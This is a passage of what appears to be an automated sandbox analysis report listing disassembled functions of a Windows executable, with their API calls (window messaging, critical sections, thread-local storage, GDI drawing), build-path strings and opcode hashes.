                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Enable
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 1336647634-3471680474
                                                                                                • Opcode ID: 5ed99c7b1fd5dcf9e30cbc6e4b65ab3073ff1b8b62e6c473b667abdf67b7872f
                                                                                                • Instruction ID: 060f0415d20f5701d67cf2528b324640669477c22f780718bdf187a1a2e1cca9
                                                                                                • Opcode Fuzzy Hash: 5ed99c7b1fd5dcf9e30cbc6e4b65ab3073ff1b8b62e6c473b667abdf67b7872f
                                                                                                • Instruction Fuzzy Hash: 4FE09235B40222AAE6301A758C06B3735984F54B01F00547BB986DA6C1DAA9C8008698
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0046337F
                                                                                                • SendMessageW.USER32(?,00000445,00000000,?), ref: 004633B8
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h, xrefs: 00463390
                                                                                                • @fO, xrefs: 0046339A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-447005085
                                                                                                • Opcode ID: 8f6df37bb46db60751fe7b335c71a8975f58d5e1b7ca823e086d3bae6978045e
                                                                                                • Instruction ID: 81da0edb36d74970b8d9a863fff6955f57277cc24c79d7dd585a8ae295a9ad0a
                                                                                                • Opcode Fuzzy Hash: 8f6df37bb46db60751fe7b335c71a8975f58d5e1b7ca823e086d3bae6978045e
                                                                                                • Instruction Fuzzy Hash: 87E09A357407106BF7306F249C06F7B229CAB50B01F00442FBA45EA2C1EBB8D810869A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0046319F
                                                                                                • SendMessageW.USER32(?,00000455,00000000,00000000), ref: 004631D5
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h, xrefs: 004631B0
                                                                                                • @fO, xrefs: 004631BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-447005085
                                                                                                • Opcode ID: 3a79fc8cce5f8a7f2d891df3a6fd6fc74513b4bbda8b34c0f16d2931f806accb
                                                                                                • Instruction ID: b913c06f0a02637a155d6b34203a4fa6f8f14eab6e1a74be06dceebfdd090dea
                                                                                                • Opcode Fuzzy Hash: 3a79fc8cce5f8a7f2d891df3a6fd6fc74513b4bbda8b34c0f16d2931f806accb
                                                                                                • Instruction Fuzzy Hash: 43E04F3078071067F7301F24AD17FB722585B41F02F15452F7A45EA2C5E6E9D810858D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004633DF
                                                                                                • SendMessageW.USER32(?,00000447,00000000,00000000), ref: 00463415
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h, xrefs: 004633F0
                                                                                                • @fO, xrefs: 004633FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-447005085
                                                                                                • Opcode ID: b28f41e55dbe914bb59a366c02216f120cd20aed29495ec74bd44f1a9f62d81b
                                                                                                • Instruction ID: 59a21007446d8a7691914aec04825490261ecac618d2a7118d181b0893fcb6ed
                                                                                                • Opcode Fuzzy Hash: b28f41e55dbe914bb59a366c02216f120cd20aed29495ec74bd44f1a9f62d81b
                                                                                                • Instruction Fuzzy Hash: 9FE04F30780710A7F6311F646D07F7725585B50F02F15442B7A45EA2D2EBE9D811868D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00473064
                                                                                                • GetLastError.KERNEL32 ref: 0047306E
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 00473084
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp, xrefs: 0047307A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterErrorException@8GlobalLastLeaveMemoryStatusThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp
                                                                                                • API String ID: 3417530223-2274833300
                                                                                                • Opcode ID: 039ae8fd8ab7256891a16d0c7486ed7ae2fca1ee3a7f650747eb298ab44db0a1
                                                                                                • Instruction ID: 3050cff72cd51b5e01df0c96030cf65d036d8e0515725f1512414e0540e87d4b
                                                                                                • Opcode Fuzzy Hash: 039ae8fd8ab7256891a16d0c7486ed7ae2fca1ee3a7f650747eb298ab44db0a1
                                                                                                • Instruction Fuzzy Hash: 5EE0927460430857E3106B648C06A3B72ECE744719F004619AE98973C1F6799A20869B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0049E289
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0049E29A
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0049E309
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0049E31A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 3508698243-0
                                                                                                • Opcode ID: 3a6b99154e7febeeb64b02b731126ab52a37e0a7e75adfc14c5d59b3791533de
                                                                                                • Instruction ID: 911ddd3b13a7400baa7f707b1aa699a240889e4fae7823ee5910fade25ef6b10
                                                                                                • Opcode Fuzzy Hash: 3a6b99154e7febeeb64b02b731126ab52a37e0a7e75adfc14c5d59b3791533de
                                                                                                • Instruction Fuzzy Hash: 33414AB6901215DFCB10CFA8C684BADFBF4FB44314F1546AED819A7741D774AA04CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0042F910: IsWindow.USER32(?), ref: 0042F926
                                                                                                  • Part of subcall function 0042F910: GetClientRect.USER32 ref: 0042F972
                                                                                                  • Part of subcall function 0042F910: GetLastError.KERNEL32(?,00000000,00000009,?,0043ED7E,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0042F97C
                                                                                                  • Part of subcall function 00439A40: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00439A50
                                                                                                  • Part of subcall function 00439A40: GetLastError.KERNEL32(?,?,0043B296,?,?,?,?), ref: 00439A5C
                                                                                                  • Part of subcall function 0044AC20: SelectObject.GDI32(?,00000000), ref: 0044AC86
                                                                                                  • Part of subcall function 0043BBD0: IsWindow.USER32(00000002), ref: 0043BC20
                                                                                                  • Part of subcall function 0043BBD0: OffsetViewportOrgEx.GDI32(?,?,?,00000000,?,?,?,?), ref: 0043BC71
                                                                                                  • Part of subcall function 0043BBD0: IsWindow.USER32(?), ref: 0043BC8E
                                                                                                  • Part of subcall function 0043BBD0: SendMessageW.USER32(00000002,00000014,?,00000000), ref: 0043BCC4
                                                                                                  • Part of subcall function 0043BBD0: OffsetViewportOrgEx.GDI32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043BCDC
                                                                                                  • Part of subcall function 0043BBD0: FillRect.USER32 ref: 0043BCF9
                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0043B2D2
                                                                                                • SelectObject.GDI32(?,?), ref: 0043B2F3
                                                                                                • DeleteDC.GDI32(?), ref: 0043B30C
                                                                                                • DeleteObject.GDI32(00000000), ref: 0043B32C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ObjectWindow$DeleteErrorLastOffsetRectSelectViewport$BitmapClientCompatibleCreateFillMessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 356505113-0
                                                                                                • Opcode ID: 84068fcd7c142746ad78c9734627648a101218adf52758e7ca46d795f7ce48d7
                                                                                                • Instruction ID: 65878a18bd61202b863c1dc0b705f007dbf048ddb8bfa05b1869f666377c19ff
                                                                                                • Opcode Fuzzy Hash: 84068fcd7c142746ad78c9734627648a101218adf52758e7ca46d795f7ce48d7
                                                                                                • Instruction Fuzzy Hash: DF3128B5900219EFDB10DF99D949BEFBBB8FB08314F144119E910B7281CBB99A04CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32 ref: 0044437F
                                                                                                • GetSystemMetrics.USER32 ref: 00444385
                                                                                                  • Part of subcall function 00439D80: CreateRectRgnIndirect.GDI32(?), ref: 00439D88
                                                                                                  • Part of subcall function 00439D80: GetLastError.KERNEL32 ref: 00439D94
                                                                                                • CombineRgn.GDI32(00000000,00000000,00000000,00000004), ref: 004443F8
                                                                                                • DeleteObject.GDI32(00000000), ref: 0044440E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$CombineCreateDeleteErrorIndirectLastObjectRect
                                                                                                • String ID:
                                                                                                • API String ID: 1610936649-0
                                                                                                • Opcode ID: 3218dfe57eaad8e295c3bc86edfe33dad4a4c11639344f8d12fc9678a04056b1
                                                                                                • Instruction ID: a7c99033e2ff562b079cc12a9ba3fd4a21b3323de30c94af3d063633736a3c64
                                                                                                • Opcode Fuzzy Hash: 3218dfe57eaad8e295c3bc86edfe33dad4a4c11639344f8d12fc9678a04056b1
                                                                                                • Instruction Fuzzy Hash: 6C314C71E042589BCB04CFA9D9457EEFBF4FB88710F14416AE515B3380D7B85940CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(0000002C,00000000,?), ref: 0049F378
                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,00000000,00000000,?,?,?,?,?,?,004DF25C,000000FF), ref: 0049F43F
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0049F3B0
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\map.h, xrefs: 0049F3A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\map.h
                                                                                                • API String ID: 944179621-1291485746
                                                                                                • Opcode ID: ddb8a5b40d4156be63307005e8649e3ca16c197964cacfd1e8030a279fa5b668
                                                                                                • Instruction ID: 31d5b4bd6daa087ff06052c2063c288dd65b5b96e3dc9c2708f1882e0d2c31ac
                                                                                                • Opcode Fuzzy Hash: ddb8a5b40d4156be63307005e8649e3ca16c197964cacfd1e8030a279fa5b668
                                                                                                • Instruction Fuzzy Hash: CA31C371900258EFDB10EB68C845BEFBFB8AF55318F14426EE815A72C1D7B85A04C7A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0048F05B
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0048F0F2
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp, xrefs: 0048F0B7
                                                                                                • @fO, xrefs: 0048F0C1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp
                                                                                                • API String ID: 944179621-200847071
                                                                                                • Opcode ID: 77bfc0e5b43718b159e885b33188c685594b2a1a17b8f2589e3354c29e631367
                                                                                                • Instruction ID: 1ef3d7c27ad34962529c0141fa21936ab6d203ed5d0a44b37382a9a4c40db383
                                                                                                • Opcode Fuzzy Hash: 77bfc0e5b43718b159e885b33188c685594b2a1a17b8f2589e3354c29e631367
                                                                                                • Instruction Fuzzy Hash: 2421C171600244AFDB10EF59CC49FAABBE9FF48314F14866AF81897392D774E904CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000170,?,?,00000000,004E6BCC,000000FF), ref: 0049D29E
                                                                                                  • Part of subcall function 0049D950: InterlockedIncrement.KERNEL32(?), ref: 0049D9D0
                                                                                                • LeaveCriticalSection.KERNEL32(00000170,00000000), ref: 0049D2D8
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0049D307
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h, xrefs: 0049D2FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8IncrementInterlockedThrow
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h
                                                                                                • API String ID: 983716022-3192388581
                                                                                                • Opcode ID: bd7332143da6082098a4f08c85cc92daa84af2e2bf9d6dee35f1d8dc7c4575b1
                                                                                                • Instruction ID: 155d6a1b8a64597b8654ef205236486c05ecee7607663e99aa195b5c27897435
                                                                                                • Opcode Fuzzy Hash: bd7332143da6082098a4f08c85cc92daa84af2e2bf9d6dee35f1d8dc7c4575b1
                                                                                                • Instruction Fuzzy Hash: A3219171D00259DBEB10DF98C945BEEBBB8BB19314F00026EE951B7381D7B96604CBE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0048F148
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0048F1D3
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp, xrefs: 0048F182
                                                                                                • @fO, xrefs: 0048F18C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp
                                                                                                • API String ID: 944179621-200847071
                                                                                                • Opcode ID: 3ba683781f58cf8bbeb19e1664f3ae02df7efc491b0a670a53e56cbaf6be4e62
                                                                                                • Instruction ID: 132fb471b9c2efcded680583b3fca93f83962de69ad5637a0473949680e7a5c4
                                                                                                • Opcode Fuzzy Hash: 3ba683781f58cf8bbeb19e1664f3ae02df7efc491b0a670a53e56cbaf6be4e62
                                                                                                • Instruction Fuzzy Hash: 36212331A002459BD710DB5DC805BAEBBB4EB85320F24862AF824E73C1D7789A00C795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(?,?), ref: 0047F244
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,?), ref: 0047F262
                                                                                                  • Part of subcall function 004753A0: TlsGetValue.KERNEL32(74E070F0,?,?,0046C1E7), ref: 004753C1
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,?), ref: 0047F2F8
                                                                                                  • Part of subcall function 0047C510: TlsGetValue.KERNEL32(00000000,?,74E070F0,0048436D,?,0046CAAD,00000000), ref: 0047C538
                                                                                                  • Part of subcall function 0047C510: TlsSetValue.KERNEL32(0053011C,?,0046CAAD,00000000), ref: 0047C556
                                                                                                  • Part of subcall function 0047C510: EnterCriticalSection.KERNEL32(00534C18), ref: 0047C587
                                                                                                  • Part of subcall function 0047C510: LeaveCriticalSection.KERNEL32(00534C18), ref: 0047C5CF
                                                                                                  • Part of subcall function 0047C510: InterlockedDecrement.KERNEL32(?), ref: 0047C5E1
                                                                                                  • Part of subcall function 0047C510: TlsSetValue.KERNEL32(0053011C), ref: 0047C607
                                                                                                • _abort.LIBCMT ref: 0047F2A3
                                                                                                  • Part of subcall function 004C1313: IsProcessorFeaturePresent.KERNEL32(00000017,004CB92F,?,004BE1F9,004844FC,?,00000000,?,004844FC,00000000,?,?), ref: 004C132F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$CriticalSection$DecrementEnterFeatureInterlockedLeavePresentProcessor_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2359752432-0
                                                                                                • Opcode ID: a73816c431d44c3483272d8e456834cc2b51c1031026a29325606692b2a14b9e
                                                                                                • Instruction ID: 89f845e92c83a7d2c49050810ed222e97aec76433bda0a75f26aaab6a7590b88
                                                                                                • Opcode Fuzzy Hash: a73816c431d44c3483272d8e456834cc2b51c1031026a29325606692b2a14b9e
                                                                                                • Instruction Fuzzy Hash: 8821AF35500244EFC714AB65D81DBADBFA5FB85754F50816EE4058B3B2CBB90904C755
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0048F32B
                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 0048F3A0
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp, xrefs: 0048F365
                                                                                                • @fO, xrefs: 0048F36F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp
                                                                                                • API String ID: 944179621-200847071
                                                                                                • Opcode ID: c10e61e7c1086d66526b83eb1e7139be6e37c0d4dac100e5da981bdeddc8b970
                                                                                                • Instruction ID: 7259e974644aa316b5da423fa1ab528454c48b1b558a8c95a6984336feafb258
                                                                                                • Opcode Fuzzy Hash: c10e61e7c1086d66526b83eb1e7139be6e37c0d4dac100e5da981bdeddc8b970
                                                                                                • Instruction Fuzzy Hash: 0E11D071A00249ABDB00AB68CC45FAEBBA8EB44724F10462AFC14977C2D7B99904C7A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetTopWindow.USER32 ref: 0043118D
